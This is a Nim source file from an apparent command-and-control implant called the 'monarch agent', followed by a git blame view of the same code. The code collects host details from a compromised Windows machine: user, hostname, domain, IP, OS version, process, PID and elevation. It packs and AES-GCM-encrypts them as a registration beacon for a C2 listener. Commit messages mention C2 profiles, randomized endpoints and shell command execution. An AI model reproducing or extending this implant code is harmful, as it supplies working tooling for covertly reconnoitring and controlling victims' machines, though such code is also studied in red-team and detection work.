src/agent/protocol/registration.nim

import winim, os, net, strformat, strutils, registry, sugar

import ../../common/[types, serialize, sequence, crypto, utils]

# Hostname/Computername
proc getHostname(): string = 
    var
        buffer = newWString(CNLEN + 1) 
        dwSize = DWORD buffer.len

    GetComputerNameW(&buffer, &dwSize)
    return $buffer[0 ..< int(dwSize)]

# Domain Name
proc getDomain(): string = 
    const ComputerNameDnsDomain = 2 # COMPUTER_NAME_FORMAT (https://learn.microsoft.com/en-us/windows/win32/api/sysinfoapi/ne-sysinfoapi-computer_name_format)
    var
        buffer = newWString(UNLEN + 1) 
        dwSize = DWORD buffer.len

    GetComputerNameExW(ComputerNameDnsDomain, &buffer, &dwSize)
    return $buffer[ 0 ..< int(dwSize)]

# Username
proc getUsername(): string = 
    const NameSamCompatible = 2 # EXTENDED_NAME_FORMAT (https://learn.microsoft.com/de-de/windows/win32/api/secext/ne-secext-extended_name_format) 
    
    var
        buffer = newWString(UNLEN + 1) 
        dwSize = DWORD buffer.len

    if getDomain() != "": 
        # If domain-joined, return username in format DOMAIN\USERNAME
        GetUserNameExW(NameSamCompatible, &buffer, &dwSize)
    else: 
        # If not domain-joined, only return USERNAME
        discard GetUsernameW(&buffer, &dwSize)

    return $buffer[0 ..< int(dwSize)]

# Current process name
proc getProcessExe(): string = 
    let 
        hProcess: HANDLE = GetCurrentProcess() 
        buffer = newWString(MAX_PATH + 1)

    try:
        if hProcess != 0: 
            if GetModuleFileNameExW(hProcess, 0, buffer, MAX_PATH): 
                # .extractFilename() from the 'os' module gets the name of the executable from the full process path
                # We replace trailing NULL bytes to prevent them from being sent as JSON data
                return string($buffer).extractFilename().replace("\u0000", "")
    finally: 
        CloseHandle(hProcess)

# Current process ID
proc getProcessId(): int = 
    return int(GetCurrentProcessId()) 

# Current process elevation/integrity level
proc isElevated(): bool = 
    # isAdmin() function from the 'os' module returns whether the process is executed with administrative privileges
    return isAdmin() 

# IPv4 Address (Internal)
proc getIPv4Address(): string = 
    # getPrimaryIPAddr from the 'net' module finds the local IP address, usually assigned to eth0 on LAN or wlan0 on WiFi, used to reach an external address. No traffic is sent
    return $getPrimaryIpAddr()

# Windows Version fingerprinting
type 
    ProductType = enum
        UNKNOWN = 0
        WORKSTATION = 1
        DC = 2
        SERVER = 3

# API Structs
type OSVersionInfoExW {.importc: "OSVERSIONINFOEXW", header: "<windows.h>".} = object
    dwOSVersionInfoSize: ULONG
    dwMajorVersion: ULONG
    dwMinorVersion: ULONG
    dwBuildNumber: ULONG
    dwPlatformId: ULONG
    szCSDVersion: array[128, WCHAR]
    wServicePackMajor: USHORT
    wServicePackMinor: USHORT
    wSuiteMask: USHORT
    wProductType: UCHAR
    wReserved: UCHAR

proc getWindowsVersion(info: OSVersionInfoExW, productType: ProductType): string =
    let
        major = info.dwMajorVersion
        minor = info.dwMinorVersion
        build = info.dwBuildNumber
        spMajor = info.wServicePackMajor
    
    if major == 10 and minor == 0:
        if productType == WORKSTATION:
            if build >= 22000:
                return "Windows 11"
            else:
                return "Windows 10"

        else:
            case build:
                of 20348:
                    return "Windows Server 2022"
                of 17763:
                    return "Windows Server 2019"
                of 14393:
                    return "Windows Server 2016"
                else:
                    return fmt"Windows Server 10.x (Build: {build})"

    elif major == 6:
        case minor:
        of 3:
            if productType == WORKSTATION:
                return "Windows 8.1"
            else:
                return "Windows Server 2012 R2"
        of 2:
            if productType == WORKSTATION:
                return "Windows 8"
            else:
                return "Windows Server 2012"
        of 1:
            if productType == WORKSTATION:
                return "Windows 7"
            else:
                return "Windows Server 2008 R2"
        of 0:
            if productType == WORKSTATION:
                return "Windows Vista"
            else:
                return "Windows Server 2008"
        else: 
            discard

    elif major == 5:
        if minor == 2:
            if productType == WORKSTATION:
                return "Windows XP x64 Edition"
            else:
                return "Windows Server 2003"
        elif minor == 1:
            return "Windows XP"
    else: 
        discard 

    return "Unknown Windows Version"

proc getProductType(): ProductType =
    # The product key is retrieved from the registry
    # HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions
    #   ProductType    REG_SZ    WinNT
    # Possible values are: 
    #   LanmanNT -> Server/Domain Controller
    #   ServerNT -> Server
    #   WinNT    -> Workstation

    # Using the 'registry' module, we can get the exact registry value
    case getUnicodeValue("""SYSTEM\CurrentControlSet\Control\ProductOptions""", "ProductType", HKEY_LOCAL_MACHINE)
    of "WinNT":
        return WORKSTATION
    of "ServerNT":
        return SERVER
    of "LanmanNT": 
        return DC

proc getOSVersion(): string = 
    
    proc rtlGetVersion(lpVersionInformation: var OSVersionInfoExW): NTSTATUS
        {.cdecl, importc: "RtlGetVersion", dynlib: "ntdll.dll".}

    when defined(windows):
        var osInfo: OSVersionInfoExW
        discard rtlGetVersion(osInfo)
        # echo $int(osInfo.dwMajorVersion)
        # echo $int(osInfo.dwMinorVersion)
        # echo $int(osInfo.dwBuildNumber)

        # RtlGetVersion does not actually set the Product Type, which is required to differentiate 
        # between workstation and server systems. The value is set to 0, which would lead to all systems being "unknown"
        # Normally, a value of 1 indicates a workstation os, while other values represent servers
        # echo $int(osInfo.wProductType).toHex

        # We instead retrieve the     
        return getWindowsVersion(osInfo, getProductType())
    else:
        return "Unknown"

proc collectAgentMetadata*(ctx: AgentCtx): AgentRegistrationData = 
    
    return AgentRegistrationData(
        header: Header(
            magic: MAGIC,
            version: VERSION, 
            packetType: cast[uint8](MSG_REGISTER),
            flags: cast[uint16](FLAG_ENCRYPTED),
            size: 0'u32,
            agentId: string.toUuid(ctx.agentId),
            seqNr: nextSequence(string.toUuid(ctx.agentId)),                              
            iv: generateBytes(Iv),
            gmac: default(AuthenticationTag)
        ), 
        agentPublicKey: ctx.agentPublicKey,
        metadata: AgentMetadata(
            listenerId: string.toUuid(ctx.listenerId),
            username: string.toBytes(getUsername()),
            hostname: string.toBytes(getHostname()),
            domain: string.toBytes(getDomain()),
            ip: string.toBytes(getIPv4Address()),
            os: string.toBytes(getOSVersion()),
            process: string.toBytes(getProcessExe()),
            pid: cast[uint32](getProcessId()),
            isElevated: cast[uint8](isElevated()),
            sleep: cast[uint32](ctx.sleep)
        )
    )

proc serializeRegistrationData*(ctx: AgentCtx, data: var AgentRegistrationData): seq[byte] = 

    var packer = Packer.init()

    # Serialize registration data
    packer 
        .add(data.metadata.listenerId)
        .addDataWithLengthPrefix(data.metadata.username)
        .addDataWithLengthPrefix(data.metadata.hostname)
        .addDataWithLengthPrefix(data.metadata.domain)
        .addDataWithLengthPrefix(data.metadata.ip)
        .addDataWithLengthPrefix(data.metadata.os)
        .addDataWithLengthPrefix(data.metadata.process)
        .add(data.metadata.pid)
        .add(data.metadata.isElevated)
        .add(data.metadata.sleep)

    let metadata = packer.pack()
    packer.reset()

    # Encrypt metadata
    let (encData, gmac) = encrypt(ctx.sessionKey, data.header.iv, metadata, data.header.seqNr)

    # Set authentication tag (GMAC)
    data.header.gmac = gmac

    # Serialize header
    let header = packer.serializeHeader(data.header, uint32(encData.len))
    packer.reset()

    # Serialize the agent's public key to add it to the header
    packer.addData(data.agentPublicKey)
    let publicKey = packer.pack()

    return header & publicKey & encData
Implemented AES256-GCM encryption of all network packets. Requires some more refactoring to remove redundant code and make it cleaner. 2025-07-23 13:47:37 +02:00			`import winim, os, net, strformat, strutils, registry, sugar`
Added monarch agent 2025-05-19 21:56:34 +02:00
Implemented sequence tracking. 2025-07-26 18:20:54 +02:00			`import ../../common/[types, serialize, sequence, crypto, utils]`
Added monarch agent 2025-05-19 21:56:34 +02:00
			`# Hostname/Computername`
Updated key management to create a new private key file if no existing one is found. 2025-07-24 22:34:12 +02:00			`proc getHostname(): string =`
Added monarch agent 2025-05-19 21:56:34 +02:00			`var`
			`buffer = newWString(CNLEN + 1)`
			`dwSize = DWORD buffer.len`

			`GetComputerNameW(&buffer, &dwSize)`
			`return $buffer[0 ..< int(dwSize)]`

			`# Domain Name`
Updated key management to create a new private key file if no existing one is found. 2025-07-24 22:34:12 +02:00			`proc getDomain(): string =`
Added monarch agent 2025-05-19 21:56:34 +02:00			`const ComputerNameDnsDomain = 2 # COMPUTER_NAME_FORMAT (https://learn.microsoft.com/en-us/windows/win32/api/sysinfoapi/ne-sysinfoapi-computer_name_format)`
			`var`
			`buffer = newWString(UNLEN + 1)`
			`dwSize = DWORD buffer.len`

			`GetComputerNameExW(ComputerNameDnsDomain, &buffer, &dwSize)`
			`return $buffer[ 0 ..< int(dwSize)]`

Implemented Windows Version fingerprinting 2025-05-21 14:06:04 +02:00			`# Username`
Updated key management to create a new private key file if no existing one is found. 2025-07-24 22:34:12 +02:00			`proc getUsername(): string =`
Implemented Windows Version fingerprinting 2025-05-21 14:06:04 +02:00			`const NameSamCompatible = 2 # EXTENDED_NAME_FORMAT (https://learn.microsoft.com/de-de/windows/win32/api/secext/ne-secext-extended_name_format)`

			`var`
			`buffer = newWString(UNLEN + 1)`
			`dwSize = DWORD buffer.len`

			`if getDomain() != "":`
			`# If domain-joined, return username in format DOMAIN\USERNAME`
			`GetUserNameExW(NameSamCompatible, &buffer, &dwSize)`
			`else:`
			`# If not domain-joined, only return USERNAME`
			`discard GetUsernameW(&buffer, &dwSize)`

			`return $buffer[0 ..< int(dwSize)]`
Added monarch agent 2025-05-19 21:56:34 +02:00
			`# Current process name`
Updated key management to create a new private key file if no existing one is found. 2025-07-24 22:34:12 +02:00			`proc getProcessExe(): string =`
Added monarch agent 2025-05-19 21:56:34 +02:00			`let`
			`hProcess: HANDLE = GetCurrentProcess()`
			`buffer = newWString(MAX_PATH + 1)`

			`try:`
			`if hProcess != 0:`
			`if GetModuleFileNameExW(hProcess, 0, buffer, MAX_PATH):`
			`# .extractFilename() from the 'os' module gets the name of the executable from the full process path`
Implemented Windows Version fingerprinting 2025-05-21 14:06:04 +02:00			`# We replace trailing NULL bytes to prevent them from being sent as JSON data`
			`return string($buffer).extractFilename().replace("\u0000", "")`
Added monarch agent 2025-05-19 21:56:34 +02:00			`finally:`
			`CloseHandle(hProcess)`

			`# Current process ID`
Updated key management to create a new private key file if no existing one is found. 2025-07-24 22:34:12 +02:00			`proc getProcessId(): int =`
Added monarch agent 2025-05-19 21:56:34 +02:00			`return int(GetCurrentProcessId())`

			`# Current process elevation/integrity level`
Updated key management to create a new private key file if no existing one is found. 2025-07-24 22:34:12 +02:00			`proc isElevated(): bool =`
Added monarch agent 2025-05-19 21:56:34 +02:00			`# isAdmin() function from the 'os' module returns whether the process is executed with administrative privileges`
			`return isAdmin()`

			`# IPv4 Address (Internal)`
Updated key management to create a new private key file if no existing one is found. 2025-07-24 22:34:12 +02:00			`proc getIPv4Address(): string =`
Added monarch agent 2025-05-19 21:56:34 +02:00			`# getPrimaryIPAddr from the 'net' module finds the local IP address, usually assigned to eth0 on LAN or wlan0 on WiFi, used to reach an external address. No traffic is sent`
			`return $getPrimaryIpAddr()`

Implemented Windows Version fingerprinting 2025-05-21 14:06:04 +02:00			`# Windows Version fingerprinting`
Implemented Heartbeat/Checkin request with agentId/listenerId in request body to simplify listener URLs 2025-07-22 21:00:39 +02:00			`type`
Updated key management to create a new private key file if no existing one is found. 2025-07-24 22:34:12 +02:00			`ProductType = enum`
Implemented Heartbeat/Checkin request with agentId/listenerId in request body to simplify listener URLs 2025-07-22 21:00:39 +02:00			`UNKNOWN = 0`
			`WORKSTATION = 1`
			`DC = 2`
			`SERVER = 3`

			`# API Structs`
Updated key management to create a new private key file if no existing one is found. 2025-07-24 22:34:12 +02:00			`type OSVersionInfoExW {.importc: "OSVERSIONINFOEXW", header: "<windows.h>".} = object`
			`dwOSVersionInfoSize: ULONG`
			`dwMajorVersion: ULONG`
			`dwMinorVersion: ULONG`
			`dwBuildNumber: ULONG`
			`dwPlatformId: ULONG`
			`szCSDVersion: array[128, WCHAR]`
			`wServicePackMajor: USHORT`
			`wServicePackMinor: USHORT`
			`wSuiteMask: USHORT`
			`wProductType: UCHAR`
			`wReserved: UCHAR`

			`proc getWindowsVersion(info: OSVersionInfoExW, productType: ProductType): string =`
Implemented agent registration to match new binary structure instead of json. 2025-07-21 22:07:25 +02:00			`let`
			`major = info.dwMajorVersion`
			`minor = info.dwMinorVersion`
			`build = info.dwBuildNumber`
			`spMajor = info.wServicePackMajor`

			`if major == 10 and minor == 0:`
			`if productType == WORKSTATION:`
			`if build >= 22000:`
			`return "Windows 11"`
			`else:`
			`return "Windows 10"`

			`else:`
			`case build:`
			`of 20348:`
			`return "Windows Server 2022"`
			`of 17763:`
			`return "Windows Server 2019"`
			`of 14393:`
			`return "Windows Server 2016"`
			`else:`
			`return fmt"Windows Server 10.x (Build: {build})"`

			`elif major == 6:`
			`case minor:`
			`of 3:`
			`if productType == WORKSTATION:`
			`return "Windows 8.1"`
			`else:`
			`return "Windows Server 2012 R2"`
			`of 2:`
			`if productType == WORKSTATION:`
			`return "Windows 8"`
			`else:`
			`return "Windows Server 2012"`
			`of 1:`
			`if productType == WORKSTATION:`
			`return "Windows 7"`
			`else:`
			`return "Windows Server 2008 R2"`
			`of 0:`
			`if productType == WORKSTATION:`
			`return "Windows Vista"`
			`else:`
			`return "Windows Server 2008"`
			`else:`
			`discard`

			`elif major == 5:`
			`if minor == 2:`
			`if productType == WORKSTATION:`
			`return "Windows XP x64 Edition"`
			`else:`
			`return "Windows Server 2003"`
			`elif minor == 1:`
			`return "Windows XP"`
			`else:`
			`discard`

			`return "Unknown Windows Version"`

Implemented Windows Version fingerprinting 2025-05-21 14:06:04 +02:00			`proc getProductType(): ProductType =`
Implemented basic shell command execution and result retrieval. Next Step: Remove completed tasks from queue 2025-05-22 20:03:22 +02:00			`# The product key is retrieved from the registry`
Implemented Windows Version fingerprinting 2025-05-21 14:06:04 +02:00			`# HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions`
			`# ProductType REG_SZ WinNT`
			`# Possible values are:`
			`# LanmanNT -> Server/Domain Controller`
			`# ServerNT -> Server`
			`# WinNT -> Workstation`

			`# Using the 'registry' module, we can get the exact registry value`
			`case getUnicodeValue("""SYSTEM\CurrentControlSet\Control\ProductOptions""", "ProductType", HKEY_LOCAL_MACHINE)`
			`of "WinNT":`
			`return WORKSTATION`
			`of "ServerNT":`
			`return SERVER`
			`of "LanmanNT":`
			`return DC`

Updated key management to create a new private key file if no existing one is found. 2025-07-24 22:34:12 +02:00			`proc getOSVersion(): string =`
Implemented Windows Version fingerprinting 2025-05-21 14:06:04 +02:00
Implemented Heartbeat/Checkin request with agentId/listenerId in request body to simplify listener URLs 2025-07-22 21:00:39 +02:00			`proc rtlGetVersion(lpVersionInformation: var OSVersionInfoExW): NTSTATUS`
Implemented Windows Version fingerprinting 2025-05-21 14:06:04 +02:00			`{.cdecl, importc: "RtlGetVersion", dynlib: "ntdll.dll".}`

			`when defined(windows):`
Implemented Heartbeat/Checkin request with agentId/listenerId in request body to simplify listener URLs 2025-07-22 21:00:39 +02:00			`var osInfo: OSVersionInfoExW`
Implemented Windows Version fingerprinting 2025-05-21 14:06:04 +02:00			`discard rtlGetVersion(osInfo)`
			`# echo $int(osInfo.dwMajorVersion)`
			`# echo $int(osInfo.dwMinorVersion)`
			`# echo $int(osInfo.dwBuildNumber)`

			`# RtlGetVersion does not actually set the Product Type, which is required to differentiate`
			`# between workstation and server systems. The value is set to 0, which would lead to all systems being "unknown"`
			`# Normally, a value of 1 indicates a workstation os, while other values represent servers`
			`# echo $int(osInfo.wProductType).toHex`

			`# We instead retrieve the`
			`return getWindowsVersion(osInfo, getProductType())`
			`else:`
			`return "Unknown"`

Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`proc collectAgentMetadata*(ctx: AgentCtx): AgentRegistrationData =`
Implemented agent registration to match new binary structure instead of json. 2025-07-21 22:07:25 +02:00
			`return AgentRegistrationData(`
			`header: Header(`
			`magic: MAGIC,`
			`version: VERSION,`
Implemented Heartbeat/Checkin request with agentId/listenerId in request body to simplify listener URLs 2025-07-22 21:00:39 +02:00			`packetType: cast[uint8](MSG_REGISTER),`
Updated message flags. 2025-07-23 13:56:43 +02:00			`flags: cast[uint16](FLAG_ENCRYPTED),`
Implemented agent registration to match new binary structure instead of json. 2025-07-21 22:07:25 +02:00			`size: 0'u32,`
Implemented profile embedding via patching a placeholder in the agent executable. Agent correctly deserializes and parses the profile and listener configuration. 2025-08-18 22:05:23 +02:00			`agentId: string.toUuid(ctx.agentId),`
			`seqNr: nextSequence(string.toUuid(ctx.agentId)),`
Refactored random byte generation functions. 2025-08-25 20:08:23 +02:00			`iv: generateBytes(Iv),`
Implemented AES256-GCM encryption of all network packets. Requires some more refactoring to remove redundant code and make it cleaner. 2025-07-23 13:47:37 +02:00			`gmac: default(AuthenticationTag)`
Implemented agent registration to match new binary structure instead of json. 2025-07-21 22:07:25 +02:00			`),`
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`agentPublicKey: ctx.agentPublicKey,`
Implemented agent registration to match new binary structure instead of json. 2025-07-21 22:07:25 +02:00			`metadata: AgentMetadata(`
Implemented profile embedding via patching a placeholder in the agent executable. Agent correctly deserializes and parses the profile and listener configuration. 2025-08-18 22:05:23 +02:00			`listenerId: string.toUuid(ctx.listenerId),`
Refactored utility functions to make them more readable and removed separate register endpoint. 2025-08-14 12:25:06 +02:00			`username: string.toBytes(getUsername()),`
			`hostname: string.toBytes(getHostname()),`
			`domain: string.toBytes(getDomain()),`
			`ip: string.toBytes(getIPv4Address()),`
			`os: string.toBytes(getOSVersion()),`
			`process: string.toBytes(getProcessExe()),`
Implemented agent registration to match new binary structure instead of json. 2025-07-21 22:07:25 +02:00			`pid: cast[uint32](getProcessId()),`
			`isElevated: cast[uint8](isElevated()),`
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`sleep: cast[uint32](ctx.sleep)`
Implemented agent registration to match new binary structure instead of json. 2025-07-21 22:07:25 +02:00			`)`
			`)`
Implemented Heartbeat/Checkin request with agentId/listenerId in request body to simplify listener URLs 2025-07-22 21:00:39 +02:00
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`proc serializeRegistrationData*(ctx: AgentCtx, data: var AgentRegistrationData): seq[byte] =`
Implemented Heartbeat/Checkin request with agentId/listenerId in request body to simplify listener URLs 2025-07-22 21:00:39 +02:00
Refactored utility functions to make them more readable and removed separate register endpoint. 2025-08-14 12:25:06 +02:00			`var packer = Packer.init()`
Implemented Heartbeat/Checkin request with agentId/listenerId in request body to simplify listener URLs 2025-07-22 21:00:39 +02:00
			`# Serialize registration data`
			`packer`
			`.add(data.metadata.listenerId)`
Refactor profile de/serialization, removing unnecessary overhead caused by TLV format. 2025-08-19 14:34:58 +02:00			`.addDataWithLengthPrefix(data.metadata.username)`
			`.addDataWithLengthPrefix(data.metadata.hostname)`
			`.addDataWithLengthPrefix(data.metadata.domain)`
			`.addDataWithLengthPrefix(data.metadata.ip)`
			`.addDataWithLengthPrefix(data.metadata.os)`
			`.addDataWithLengthPrefix(data.metadata.process)`
Implemented Heartbeat/Checkin request with agentId/listenerId in request body to simplify listener URLs 2025-07-22 21:00:39 +02:00			`.add(data.metadata.pid)`
			`.add(data.metadata.isElevated)`
			`.add(data.metadata.sleep)`

			`let metadata = packer.pack()`
			`packer.reset()`

Implemented AES256-GCM encryption of all network packets. Requires some more refactoring to remove redundant code and make it cleaner. 2025-07-23 13:47:37 +02:00			`# Encrypt metadata`
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`let (encData, gmac) = encrypt(ctx.sessionKey, data.header.iv, metadata, data.header.seqNr)`
Implemented AES256-GCM encryption of all network packets. Requires some more refactoring to remove redundant code and make it cleaner. 2025-07-23 13:47:37 +02:00
			`# Set authentication tag (GMAC)`
			`data.header.gmac = gmac`
Implemented Heartbeat/Checkin request with agentId/listenerId in request body to simplify listener URLs 2025-07-22 21:00:39 +02:00
			`# Serialize header`
Cleaned up parts of the serialization by removing redundant code. 2025-07-28 21:29:47 +02:00			`let header = packer.serializeHeader(data.header, uint32(encData.len))`
Implemented AES256-GCM encryption of all network packets. Requires some more refactoring to remove redundant code and make it cleaner. 2025-07-23 13:47:37 +02:00			`packer.reset()`

Implemented ECDH key exchange using ed25519 to share a symmetric AES key without transmitting it over the network. 2025-07-24 15:31:46 +02:00			`# Serialize the agent's public key to add it to the header`
			`packer.addData(data.agentPublicKey)`
			`let publicKey = packer.pack()`
Implemented Heartbeat/Checkin request with agentId/listenerId in request body to simplify listener URLs 2025-07-22 21:00:39 +02:00
Implemented ECDH key exchange using ed25519 to share a symmetric AES key without transmitting it over the network. 2025-07-24 15:31:46 +02:00			`return header & publicKey & encData`